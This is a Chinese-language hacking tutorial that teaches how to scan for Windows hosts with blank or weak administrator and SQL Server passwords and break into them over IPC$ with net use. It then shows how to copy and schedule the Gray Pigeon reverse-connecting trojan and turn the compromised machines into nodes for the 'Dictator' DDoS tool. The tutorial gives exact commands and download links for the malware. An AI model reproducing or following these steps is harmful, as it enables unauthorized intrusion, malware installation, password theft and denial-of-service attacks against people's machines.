一、扫描
扫描软件在网络上很多,功能也各一,在这里我推荐大家用x-scan2.0,下载地http://www.ttian.net/download/show.php?id=473
下载解压后,运行x-scan-gui,在“扫描模块”里只选“nt-server弱口令“和“sql-server弱口令”这两项;在“扫描参数”里“基本设置”选项设置你要扫描的ip地址;在“端口相关设置”里“待检测端口”输入你要扫描的端口,在这里可以只扫描1433和3389这两个端口,其它的不变。一切准备好后就开始扫描,要不了多久就会出现结果。
二、入侵
在这里我们要用到一个木马,我推荐大家用“灰鸽子”,它是一个反弹性木马,具有自动上线连接的功能,当中木马机器的ip地址变了时也会自动上线连接。
下载地http://www.ttian.net/download/show.php?id=446。
下载解压后有p-client.exe(在自己的机器上运行的客户端程序)和server.exe(在肉鸡上运行的程序)。我们要让对方运行server.exe程序(记住这个程序不要在自己的机器上运行哟)。在让对方运行server.exe程序之前先配置server.exe程序(注意如果不配置这个程序即使对方运行了我们上传上去的server.exe程序,我们也不能和他连接)。具体配置server的方http://www.ttian.net/article/show.php?id=357
比如我们刚才扫描到一台ip为61.216.216.216的主机,administrator密码为空。我们要利用刚才扫描得到的nt弱口令,再用ipc$管道来连接。具体如下:
1、先和对方主机建立连接,操作如下:
net use \\61.216.216.216\ipc$ "" /user:"administrator"
2、拷贝木马程序到对方的机器的c盘下,操作如下:
copy server.exe \\61.216.216.216\c$
3、查看对方时间,操作如下:
net time \\61.216.216.216
4、假设对方的时间为下午1:23,让对方机器在13:25运行木马程序,操作如下:
at \\61.216.216.216 13:25 c:\server.exe(注意对方的时间为12小时制,我们用at命令时要转换为24小时制,让对方运行木马的时间最好比对方机器的当前时间多几分钟)
5、查看木马程序是否运行,操作如下:
at \\61.216.216.216
如果清单为空,说明木马已运行了,这时我们可以在自己的机器上运行p-client.exe,刚才中了木马的机器就会自动来连接。
三、攻击
我写这篇文章的主要目的就是它。我们在这里要用到的一个攻击软件叫“独裁者”,它是一个采用的是分布式拒绝服务攻击的软件,下载下地http://www.leothreads.com/usr/25/25_18196.zip
“独裁者”的使用教程:
我们要让肉鸡运行“独裁者”的server.exe程序。
在木马“灰鸽子”里进入ip为61.216.216.216的主机的c盘,点右键“文件上传自”找到“独裁者”的server.exe点打开既可。当程序上传完后点刷新就可以看到我们刚才上传的server.exe文件了。右键点server.exe选“远程打开”“隐藏运行”,过一会我们就可以在
“独裁者”里加61.216.216.216这个ip了。
也许有人要问:“就是为什么我们要让对方对行木马,我们不可以直接在dos下上传“独裁者”的server.exe文件并上它运行就行了吗?
在这里我要说的就是“独裁者”没有自动连接的功能,如果肉鸡不是固定的ip,哪肉鸡就只能用一次,因为肉鸡原来哪个ip变了呀!这里的木马就有自动上线连接ip的功能,即使肉鸡的ip变了也能和连接。这样肉鸡就飞不了啦!嘿嘿!
其实这个的木马还有很多功能,比如可以用来作代理、查看对方屏幕、记录密码等,这就要你自己去慢慢探索吧。
以上全部在win2000里通过。